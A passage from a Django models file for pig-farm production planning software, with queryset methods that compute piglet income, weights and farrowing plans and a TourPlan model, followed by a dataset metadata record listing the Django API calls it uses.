).annotate(income_total=ExpressionWrapper(F('count_income') * F('ws3_av_weight'), output_field=models.FloatField())) def add_income_quantity_and_total_from_weights(self, ws): places = self.get_places(ws=ws) subquery = piglets_events.models.WeighingPiglets.objects \ .filter(week_tour=OuterRef('tour'), place__in=places) \ .values('week_tour') \ .annotate(sum_quantity=Sum('piglets_quantity')) \ .values('sum_quantity') return self.annotate(count_income=ExpressionWrapper( Coalesce( Round( Subquery(subquery) * F(f'ws{ws}_safety') / 100.0, precision=0), 0), output_field=models.IntegerField()), ).annotate(income_total=ExpressionWrapper( Coalesce( Round( F('count_income') * F(f'ws{ws}_av_weight'), precision=0), 0), output_field=models.IntegerField())) def agg_for_month_by_ws(self, ws_number): agg_dict = { '_count_income': Sum('count_income'), '_income_total': Sum('income_total'), f'ws{ws_number}_safety': Avg(f'ws{ws_number}_safety'), f'ws{ws_number}_av_weight': Avg(f'ws{ws_number}_av_weight'), f'ws{ws_number}_korm_conversion': Avg(f'ws{ws_number}_korm_conversion'), f'ws{ws_number}_trud': Avg(f'ws{ws_number}_trud'), f'ws{ws_number}_vet': Avg(f'ws{ws_number}_vet'), } return self.aggregate(**agg_dict) def add_born_alive_plan(self): return self.annotate(plan_farrow=ExpressionWrapper(Round( F('ws12_seminations') * F('ws12_farrow_percent') / 100.0, precision=0), output_field=models.IntegerField()) ) \ .annotate(count_piglets_alive=ExpressionWrapper(Round( F('plan_farrow') * F('ws12_av_priplod')), output_field=models.IntegerField() )) def agg_sows_month_data(self): return self.aggregate( ws12_seminations=Sum('ws12_seminations'), count_piglets_alive_total=Sum('count_piglets_alive'), plan_farrows=Sum('plan_farrow'), ws12_farrow_percent=Avg('ws12_farrow_percent'), ws12_av_priplod=Avg('ws12_av_priplod'), ws12_korm_conversion=Avg('ws12_korm_conversion'), ws12_vet=Avg('ws12_vet'), ws12_trud=Avg('ws12_trud'), ) def coming_piglets_plans(self, ws_number): if ws_number == '_otkorm': return self.filter(tour__in=Tour.objects.exclude(piglets_culling__culling_type='spec')) else: places = list() if ws_number == 3: places = ['3/4'] if ws_number == 4: places = ['4/8'] if ws_number == 8: places = ['8/5', '8/6', '8/7'] return self.filter(tour__in=Tour.objects.exclude(piglets_weights__place__in=places)) def coming_sow_plan(self): return self.filter(tour__sowfarrow=None, default=False) class TourPlan(CoreModel): tour = models.OneToOneField(Tour, on_delete=models.SET_NULL, null=True, blank=True, related_name='plan') tour_name = models.CharField(max_length=20, null=True) week_number = models.IntegerField() year = models.IntegerField() default = models.BooleanField(default=False) # vosproizvodstvo ws12_seminations = models.IntegerField(default=0) # + set ws12_born_alive = models.IntegerField(default=0) # + calc ws12_farrow_percent = models.IntegerField(default=0) # + set ws12_av_priplod = models.FloatField(default=0) # + set ws12_korm_conversion = models.FloatField(default=0) # month set ws12_vet = models.FloatField(default=0) # month set ws12_trud = models.FloatField(default=0) # + чел часы month set # matochnik ws3_weaning = models.FloatField(default=0) # + ws3_av_weight = models.FloatField(default=0) # + ws3_total_weight = models.FloatField(default=0) # + ws3_safety = models.IntegerField(default=0) # + ws3_korm_conversion = models.FloatField(default=0) # month ws3_trud = models.FloatField(default=0) # month ws3_vet = models.FloatField(default=0) # month # ws3_prives # dor1 ws4_weaning = models.FloatField(default=0) # + ws4_av_weight = models.FloatField(default=0) # + ws4_total_weight = models.FloatField(default=0) # + ws4_safety = models.IntegerField(default=0) # + ws4_korm_conversion = models.FloatField(default=0) # + ws4_trud = models.FloatField(default=0) # + ws4_vet = models.FloatField(default=0) # + # dor1 ws8_weaning = models.FloatField(default=0) # + ws8_av_weight = models.FloatField(default=0) # + ws8_total_weight = models.FloatField(default=0) # + ws8_safety = models.IntegerField(default=0) # + ws8_korm_conversion = models.FloatField(default=0) # + ws8_trud = models.FloatField(default=0) # + ws8_vet = models.FloatField(default=0) # + # dor1 ws_otkorm_weaning = models.FloatField(default=0) # + ws_otkorm_av_weight = models.FloatField(default=0) # + ws_otkorm_total_weight = models.FloatField(default=0) # + ws_otkorm_safety = models.IntegerField(default=0) # + ws_otkorm_korm_conversion = models.FloatField(default=0) # + ws_otkorm_trud = models.FloatField(default=0) # + ws_otkorm_vet = models.FloatField(default=0) # + objects = TourPlanQuerySet.as_manager() def __str__(self): return f'Plan {self.week_number} {self.year}' # @property # def plan_ws3_weaning(self): # return self.ws3_weaning * self.tour.weaning_quantity
null
svinbin/tours/models.py
models.py
py
56,938
python
en
code
null
code-starcoder2
83
[ { "api_name": "django.db.models.QuerySet", "line_number": 18, "usage_type": "attribute" }, { "api_name": "django.db.models", "line_number": 18, "usage_type": "name" }, { "api_name": "django.db.models.OuterRef", "line_number": 20, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 22, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 26, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 29, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 33, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 36, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 40, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 43, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 47, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 50, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 53, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 55, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 59, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 60, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 61, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 62, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 63, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 64, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 65, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 71, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 72, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 74, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 76, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 76, "usage_type": "name" }, { "api_name": "django.db.models.Subquery", "line_number": 78, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 78, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 80, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 82, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 82, "usage_type": "name" }, { "api_name": "django.db.models.Subquery", "line_number": 84, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 85, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 87, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 93, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 94, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 94, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 94, "usage_type": "name" }, { "api_name": "django.db.models.Subquery", "line_number": 99, "usage_type": "call" }, { "api_name": "sows.models.Sow.objects.filter", "line_number": 100, "usage_type": "call" }, { "api_name": "sows.models.Sow", "line_number": 100, "usage_type": "attribute" }, { "api_name": "sows.models", "line_number": 100, "usage_type": "name" }, { "api_name": "django.db.models.OuterRef", "line_number": 100, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 101, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 102, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 103, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 104, "usage_type": "call" }, { "api_name": "django.db.models.Count", "line_number": 107, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 109, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 109, "usage_type": "name" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 118, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 118, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 119, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 123, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 125, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 125, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 126, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 126, "usage_type": "name" }, { "api_name": "django.db.models.Avg", "line_number": 129, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 131, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 131, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 132, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 132, "usage_type": "name" }, { "api_name": "django.db.models.Sum", "line_number": 135, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 137, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 137, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 138, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 138, "usage_type": "name" }, { "api_name": "django.db.models.Count", "line_number": 140, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 142, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 143, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 143, "usage_type": "name" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 149, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 149, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 150, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 154, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 158, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 159, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 160, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 160, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 161, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 161, "usage_type": "name" }, { "api_name": "django.db.models.Subquery", "line_number": 169, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 169, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 169, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 170, "usage_type": "call" }, { "api_name": "django.db.models.DateTimeField", "line_number": 173, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 173, "usage_type": "name" }, { "api_name": "django.db.models.Subquery", "line_number": 177, "usage_type": "call" }, { "api_name": "piglets_events.models.CullingPiglets.objects.filter", "line_number": 177, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 177, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 178, "usage_type": "call" }, { "api_name": "django.db.models.DateTimeField", "line_number": 181, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 181, "usage_type": "name" }, { "api_name": "piglets_events.models.CullingPiglets.objects.filter", "line_number": 190, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 190, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 193, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 195, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 196, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 197, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 198, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 199, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 205, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 208, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 209, "usage_type": "call" }, { "api_name": "django.db.models.IntegerField", "line_number": 209, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 209, "usage_type": "name" }, { "api_name": "django.db.models.Avg", "line_number": 218, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 218, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 218, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 218, "usage_type": "name" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 221, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 222, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 223, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 223, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 248, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 249, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 249, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 250, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 251, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 252, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 253, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 253, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 254, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 254, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 257, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 258, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 258, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 259, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 260, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 261, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 262, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 262, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 263, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 263, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 275, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 276, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 276, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 277, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 278, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 279, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 280, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 280, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 281, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 281, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 284, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 285, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 285, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 286, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 287, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 288, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 289, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 289, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 290, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 290, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 294, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 295, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 295, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 296, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 297, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 298, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 299, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 299, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 300, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 300, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 308, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 309, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 309, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 310, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 311, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 312, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 313, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 313, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 314, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 314, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 317, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 318, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 318, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 319, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 320, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 321, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 322, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 322, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 323, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 323, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 335, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 336, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 336, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 337, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 338, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 339, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 340, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 340, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 341, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 341, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 344, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 345, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 345, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 346, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 347, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 348, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 349, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 349, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 350, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 350, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 354, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 355, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 355, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 356, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 357, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 358, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 359, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 359, "usage_type": "name" }, { "api_name": "django.db.models.FloatField", "line_number": 360, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 360, "usage_type": "name" }, { "api_name": "django.db.models.F", "line_number": 371, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 372, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 373, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 374, "usage_type": "call" }, { "api_name": "django.db.models.Case", "line_number": 375, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 376, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 376, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 377, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 378, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 379, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 380, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 380, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 380, "usage_type": "name" }, { "api_name": "django.db.models.Case", "line_number": 384, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 385, "usage_type": "call" }, { "api_name": "django.db.models.Q", "line_number": 385, "usage_type": "call" }, { "api_name": "django.db.models.When", "line_number": 386, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 387, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 388, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 389, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 389, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 389, "usage_type": "name" }, { "api_name": "django.db.models.Prefetch", "line_number": 397, "usage_type": "call" }, { "api_name": "sows_events.models.Semination.objects.filter", "line_number": 399, "usage_type": "call" }, { "api_name": "sows_events.models.Semination", "line_number": 399, "usage_type": "attribute" }, { "api_name": "sows_events.models", "line_number": 399, "usage_type": "name" }, { "api_name": "django.db.models.Prefetch", "line_number": 402, "usage_type": "call" }, { "api_name": "sows_events.models.Ultrasound.objects.filter", "line_number": 404, "usage_type": "call" }, { "api_name": "sows_events.models.Ultrasound", "line_number": 404, "usage_type": "attribute" }, { "api_name": "sows_events.models", "line_number": 404, "usage_type": "name" }, { "api_name": "django.db.models.Prefetch", "line_number": 407, "usage_type": "call" }, { "api_name": "sows_events.models.SowFarrow.objects.filter", "line_number": 409, "usage_type": "call" }, { "api_name": "sows_events.models.SowFarrow", "line_number": 409, "usage_type": "attribute" }, { "api_name": "sows_events.models", "line_number": 409, "usage_type": "name" }, { "api_name": "django.db.models.Prefetch", "line_number": 412, "usage_type": "call" }, { "api_name": "sows_events.models.WeaningSow.objects.filter", "line_number": 414, "usage_type": "call" }, { "api_name": "sows_events.models.WeaningSow", "line_number": 414, "usage_type": "attribute" }, { "api_name": "sows_events.models", "line_number": 414, "usage_type": "name" }, { "api_name": "django.db.models.Subquery", "line_number": 422, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 424, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 429, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 433, "usage_type": "call" }, { "api_name": "django.db.models.OuterRef", "line_number": 434, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 437, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 446, "usage_type": "call" }, { "api_name": "sows_events.models.PigletsToSowsEvent.objects.filter", "line_number": 446, "usage_type": "call" }, { "api_name": "sows_events.models.PigletsToSowsEvent", "line_number": 446, "usage_type": "attribute" }, { "api_name": "sows_events.models", "line_number": 446, "usage_type": "name" }, { "api_name": "django.db.models.OuterRef", "line_number": 447, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 450, "usage_type": "call" }, { "api_name": "sows_events.models.PigletsToSowsEvent.objects.filter", "line_number": 454, "usage_type": "call" }, { "api_name": "sows_events.models.PigletsToSowsEvent", "line_number": 454, "usage_type": "attribute" }, { "api_name": "sows_events.models", "line_number": 454, "usage_type": "name" }, { "api_name": "django.db.models.OuterRef", "line_number": 455, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 458, "usage_type": "call" }, { "api_name": "django.db.models.functions.Coalesce", "line_number": 464, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 464, "usage_type": "call" }, { "api_name": "sows_events.models.PigletsToSowsEvent.objects.filter", "line_number": 465, "usage_type": "call" }, { "api_name": "sows_events.models.PigletsToSowsEvent", "line_number": 465, "usage_type": "attribute" }, { "api_name": "sows_events.models", "line_number": 465, "usage_type": "name" }, { "api_name": "django.db.models.OuterRef", "line_number": 466, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 468, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 481, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 482, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 483, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 484, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 485, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 486, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 486, "usage_type": "name" }, { "api_name": "django.db.models.Sum", "line_number": 488, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 489, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 489, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 494, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 495, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 496, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 497, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 498, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 499, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 499, "usage_type": "name" }, { "api_name": "django.db.models.Sum", "line_number": 501, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 502, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 502, "usage_type": "name" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 505, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 505, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 506, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 514, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 516, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 516, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 517, "usage_type": "call" }, { "api_name": "django.db.models.Avg", "line_number": 525, "usage_type": "call" }, { "api_name": "piglets_events.models.WeighingPiglets.objects.filter", "line_number": 527, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 527, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 528, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 551, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 552, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 553, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 554, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 554, "usage_type": "name" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 562, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 563, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 564, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 565, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 565, "usage_type": "name" }, { "api_name": "django.db.models.Subquery", "line_number": 574, "usage_type": "call" }, { "api_name": "piglets_events.models.CullingPiglets.objects.filter", "line_number": 574, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 574, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 575, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 580, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 581, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 582, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 583, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 584, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 585, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 585, "usage_type": "name" }, { "api_name": "django.db.models.Sum", "line_number": 587, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 588, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 588, "usage_type": "name" }, { "api_name": "django.db.models.Subquery", "line_number": 592, "usage_type": "call" }, { "api_name": "piglets_events.models.CullingPiglets.objects.filter", "line_number": 592, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 592, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 593, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 598, "usage_type": "call" }, { "api_name": "django.db.models.Subquery", "line_number": 608, "usage_type": "call" }, { "api_name": "piglets_events.models.CullingPiglets.objects.filter", "line_number": 608, "usage_type": "call" }, { "api_name": "piglets_events.models", "line_number": 608, "usage_type": "attribute" }, { "api_name": "django.db.models.OuterRef", "line_number": 609, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 613, "usage_type": "call" }, { "api_name": "django.db.models.Sum", "line_number": 614, "usage_type": "call" }, { "api_name": "django.db.models.ExpressionWrapper", "line_number": 615, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 616, "usage_type": "call" }, { "api_name": "django.db.models.F", "line_number": 617, "usage_type": "call" }, { "api_name": "django.db.models.FloatField", "line_number": 618, "usage_type": "call" }, { "api_name": "django.db.models", "line_number": 618, "usage_type": "name" 